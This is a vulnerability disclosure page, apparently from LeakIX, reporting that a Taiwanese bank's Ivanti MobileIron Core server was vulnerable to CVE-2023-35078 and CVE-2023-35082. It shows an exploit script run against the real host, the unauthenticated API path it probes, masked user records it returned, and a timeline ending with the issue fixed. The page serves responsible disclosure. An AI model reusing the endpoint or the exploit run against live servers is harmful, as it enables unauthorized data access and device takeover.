• Creation
  • Validation
  • Communication & fix
  • Disclosure

linebank.com.tw / Ivanti MobileIron core is outdated
Chocapikk reported 2023-08-09

The following Ivanti MobileIron instance is publicly accessible and looks out-dated :

It is critical to update to a safe version as soon as possible since it could lead to instance and devices takeover. Those vulnerabilities are currently used in ransomware campaign and could damage your network.

Reference:

Proof Of Concept:

$ python3.10 exploit.py --verbose -u https://mdc.linebank.com.tw                                  1:16:36 
Fetching data from: 
https://mdc.linebank.com.tw:443/mifs/asfV3/api/v2/authorized/users?adminDeviceSpaceId=1
https://mdc.linebank.com.tw:443 may be vulnerable
Fetching data from: 
http://mdc.linebank.com.tw:8080/mifs/asfV3/api/v2/authorized/users?adminDeviceSpaceId=1
Connection Error...
Fetching data from: 
https://mdc.linebank.com.tw:8080/mifs/asfV3/api/v2/authorized/users?adminDeviceSpaceId=1
Connection Error...
Fetching data from: https://mdc.linebank.com.tw:443/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
https://mdc.linebank.com.tw:443 may be vulnerable
https://mdc.linebank.com.tw:443 may be vulnerable to CVE-2023-35082, CVE-2023-35078

Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.linebank.com.tw
Roles: ROLE_MPW_LOCATE, ROLE_MPW_WIPE, ROLE_MPW_REG, ROLE_USER_GOOGLE_DEVICE_ACCOUNT, ROLE_MPW_RETIRE, 
ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_UNLOCK, ROLE_MPW_CHANGE_OWNERSHIP, ROLE_USER_PORTAL_RW, ROLE_MPW_LOCK
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.linebank.com.tw
Roles: ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.linebank.com.tw
Roles: ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.linebank.com.tw
Roles: ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.linebank.com.tw
Roles: ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.linebank.com.tw
Roles: 
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.linebank.com.tw
Roles: ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.linebank.com.tw
Roles: ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.linebank.com.tw
Roles: ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.linebank.com.tw
Roles: ROLE_USER_PORTAL_RW
--------------------------------------------------
IP:
122.147.39.219
Port:
443
Detected protocol:
https
Vulnerable URL:
https://mdc.linebank.com.tw 
Found vulnerable Ivanti MobileIron Core instance:
Affected by CVE-2023-35078
Affected by CVE-2023-35082
Found by MobileIronCorePlugin 2023-08-07
Report created by Chocapikk  2023-08-09
Report approved by BloodyShell  2023-08-10
New PDF report generated by system 2023-08-10
Report dispatched to ...@... by system 2023-08-10
Report dispatched to ...@... by system 2023-08-10
Report dispatched to ...@... by system 2023-08-10
Report dispatched to ...@... by system 2023-08-10
Report dispatched to ...@... by system 2023-08-10
Report dispatched to ...@... by system 2023-08-10
Report dispatched to ...@... by system 2023-08-10
Report dispatched to ...@... by system 2023-08-10
Report dispatched to ...@... by system 2023-08-10
Report dispatched to ...@... by system 2023-08-10
Report edited by BloodyShell  2023-08-13
New PDF report generated by system 2023-08-13
Report marked as fixed by BloodyShell  2023-08-13
Report closed by BloodyShell  2023-08-13
New PDF report generated by system 2023-08-13
Report edited by Chocapikk  2023-08-13
New PDF report generated by system 2023-08-13
Information
Owner linebank.com.tw
Created 2023-08-09 23:17
Updated 2023-08-13 21:47
Fixed true
Contacts
s...@linebank.com.tw
a...@linebank.com.tw
a...@linebank.com.tw
a...@linebank.com.tw
a...@linebank.com.tw
a...@linebank.com.tw
a...@linebank.com.tw
a...@linebank.com.tw
a...@linebank.com.tw
a...@linebank.com.tw
Status
Status closed
Hosting contacted false
CERT contacted false
Download report

© 2024 LeakIX
About LeakIX - Credits - Take-down and blacklist requests - Security issues - Terms and conditions - Cookie policy - Legal notice